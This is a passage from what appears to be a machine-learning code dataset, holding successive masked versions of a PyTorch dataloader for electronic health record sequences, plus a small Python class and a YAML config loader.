240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-4": "<mask token>\nfrom __future__ import print_function, division\nfrom tabulate import tabulate\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport warnings\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nwarnings.filterwarnings('ignore')\nplt.ion()\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nuse_cuda = torch.cuda.is_available()\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n \"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-5": "# coding: utf-8\n\"\"\"\nCreated on Mon Oct 29 12:57:40 2018\n\n@authors Jzhu, Lrasmy , Xin128 @ DeguiZhi Lab - UTHealth SBMI\n\nLast updated Feb 20 2020\n\"\"\"\n\n#general utilities\nfrom __future__ import print_function, division\nfrom tabulate import tabulate\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport warnings\nfrom torch.autograd import Variable\nimport torch.nn.functional as F \nimport torch.nn as nn\nwarnings.filterwarnings(\"ignore\")\nplt.ion()\n\n#torch libraries \nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\nuse_cuda = torch.cuda.is_available()\n#use_cuda=False\n\n# Dataset class loaded from pickles\nclass EHRdataFromPickles(Dataset):\n def __init__(self, root_dir, file = None, transform=None, sort = True, model='RNN', test_ratio = 0, valid_ratio = 0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding='bytes') \n if sort: \n self.data.sort(key=lambda pt:len(pt[2]),reverse=True) \n self.test_ratio = test_ratio \n self.valid_ratio = valid_ratio \n else:\n print('No file specified')\n self.root_dir = root_dir \n self.transform = transform \n \n def __splitdata__(self, sort = True):\n \n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize) \n test= self.data[:nTest]\n valid = self.data[nTest:nTest+nValid]\n train = self.data[nTest+nValid:]\n if sort: \n #sort train, validation and test again\n test.sort(key=lambda pt:len(pt[2]),reverse=True) \n valid.sort(key=lambda pt:len(pt[2]),reverse=True) \n train.sort(key=lambda pt:len(pt[2]),reverse=True) \n return train, test, valid\n \n \n def __getitem__(self, idx, seeDescription = False):\n '''\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n '''\n if self.file != None: \n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n \n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]} \n if seeDescription: \n '''\n if this is True:\n You will get a descriptipn of what each part of data stands for\n '''\n print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']], \n ['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]], \n headers=['data_description', 'data'], tablefmt='orgtbl'))\n #print('\\n Raw sample of index :', str(idx)) \n return sample\n\n def __len__(self):\n ''' \n just the length of data\n '''\n if self.file != None:\n return len(self.data)\n else: \n print('No file specified')\n\n\n\n# Dataset class from already loaded pickled lists\nclass EHRdataFromLoadedPickles(Dataset):\n def __init__(self, loaded_list, transform=None, sort = True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list \n if sort: \n self.data.sort(key=lambda pt:len(pt[2]),reverse=True) \n self.transform = transform \n \n \n def __getitem__(self, idx, seeDescription = False):\n '''\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n '''\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n \n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]} \n if seeDescription: \n '''\n if this is True:\n You will get a descriptipn of what each part of data stands for\n '''\n print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']], \n ['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]], \n headers=['data_description', 'data'], tablefmt='orgtbl'))\n #print('\\n Raw sample of index :', str(idx)) \n return sample\n\n def __len__(self):\n return len(self.data)\n \ndef preprocess(batch,pack_pad,surv): ### LR Sep 30 20 added surv_m\n # Check cuda availability\n if use_cuda:\n flt_typ=torch.cuda.FloatTensor\n lnt_typ=torch.cuda.LongTensor\n else: \n lnt_typ=torch.LongTensor\n flt_typ=torch.FloatTensor\n mb=[]\n mtd=[]\n lbt=[]\n seq_l=[]\n bsize=len(batch) ## number of patients in minibatch\n lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch\n llv=0\n for x in batch:\n lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv=lv # max number of codes per visit in minibatch \n for pt in batch:\n sk,label,ehr_seq_l = pt\n lpx=len(ehr_seq_l) ## no of visits in pt record\n seq_l.append(lpx)\n if surv: lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m\n else: lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl=[]\n time_dim=[]\n for ehr_seq in ehr_seq_l:\n pd=(0, (llv -len(ehr_seq[1])))\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,\"constant\", 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))\n\n ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0)) \n lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits \n if pack_pad:\n zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise. \n else: \n zp= nn.ZeroPad2d((0,0,lpp,0))\n ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes\n mb.append(ehr_seq_t)\n time_dim_v= Variable(torch.stack(time_dim,0))\n time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes\n mtd.append(time_dim_pv)\n lbt_t= Variable(torch.stack(lbt,0))\n mb_t= Variable(torch.stack(mb,0)) \n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t,seq_l, mtd \n \ndef preprocess_multilabel(batch,pack_pad): ### LR Feb 18 21 for multi-label \n # Check cuda availability\n if use_cuda:\n flt_typ=torch.cuda.FloatTensor\n lnt_typ=torch.cuda.LongTensor\n else: \n lnt_typ=torch.LongTensor\n flt_typ=torch.FloatTensor\n mb=[]\n mtd=[]\n lbt=[]\n seq_l=[]\n bsize=len(batch) ## number of patients in minibatch\n lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch\n llv=0\n for x in batch:\n lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv=lv # max number of codes per visit in minibatch \n for pt in batch:\n sk,label,ehr_seq_l = pt\n lpx=len(ehr_seq_l) ## no of visits in pt record\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m\n ehr_seq_tl=[]\n time_dim=[]\n for ehr_seq in ehr_seq_l:\n pd=(0, (llv -len(ehr_seq[1])))\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,\"constant\", 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))\n\n ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0)) \n lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits \n if pack_pad:\n zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise. \n else: \n zp= nn.ZeroPad2d((0,0,lpp,0))\n ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes\n mb.append(ehr_seq_t)\n time_dim_v= Variable(torch.stack(time_dim,0))\n time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes\n mtd.append(time_dim_pv)\n lbt_t= Variable(torch.stack(lbt,0))\n mb_t= Variable(torch.stack(mb,0)) \n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t,seq_l, mtd \n\n \n#customized parts for EHRdataloader\ndef my_collate(batch):\n if multilabel_m : mb_t, lbt_t,seq_l, mtd =preprocess_multilabel(batch,pack_pad) ### LR Sep 30 20 added surv_m\n else: mb_t, lbt_t,seq_l, mtd = preprocess(batch,pack_pad,surv_m) ### LR Sep 30 20 added surv_m\n \n return [mb_t, lbt_t,seq_l, mtd]\n \n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n # Fill in the first samplesize elements:\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results) \n return results\n\nclass EHRdataloader(DataLoader):\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None, batch_sampler=None,\n num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, packPadMode = False , surv=False,multilbl=False): ### LR Sep 30 20 added surv\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=False, sampler=None, batch_sampler=None,\n num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m ### LR Sep 30 20 added surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m=surv ### LR Sep 30 20 added surv_m\n multilabel_m=multilbl\n if multilabel_m : print('multilabel data processing')\n\n \n########END of main contents of EHRDataloader############\n",
"step-ids": [
15,
16,
17,
18,
19
]
}
|
[
15,
16,
17,
18,
19
] |
class Action(dict):
def __init__(self, action, player=None, target=None):
self['action'] = action
self['player'] = player
if target != None:
self['target'] = target
|
normal
|
{
"blob_id": "1c9345923fe83aa0ee7165ce181ce05ac55e2b2f",
"index": 7773,
"step-1": "<mask token>\n",
"step-2": "class Action(dict):\n <mask token>\n",
"step-3": "class Action(dict):\n\n def __init__(self, action, player=None, target=None):\n self['action'] = action\n self['player'] = player\n if target != None:\n self['target'] = target\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'config.yaml')
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import yaml
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'config.yaml')
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
#!/usr/bin/python
# encoding=utf-8
"""
@Author : Don
@Date : 9/16/2020 1:40 PM
@Desc :
"""
import os
import yaml
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.yaml")
with open(config_path, "r", encoding="utf-8") as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
|
flexible
|
{
"blob_id": "8834548f6180fc864d73a71194125b22d230a393",
"index": 6882,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-3": "<mask token>\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'config.yaml')\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-4": "<mask token>\nimport os\nimport yaml\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'config.yaml')\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
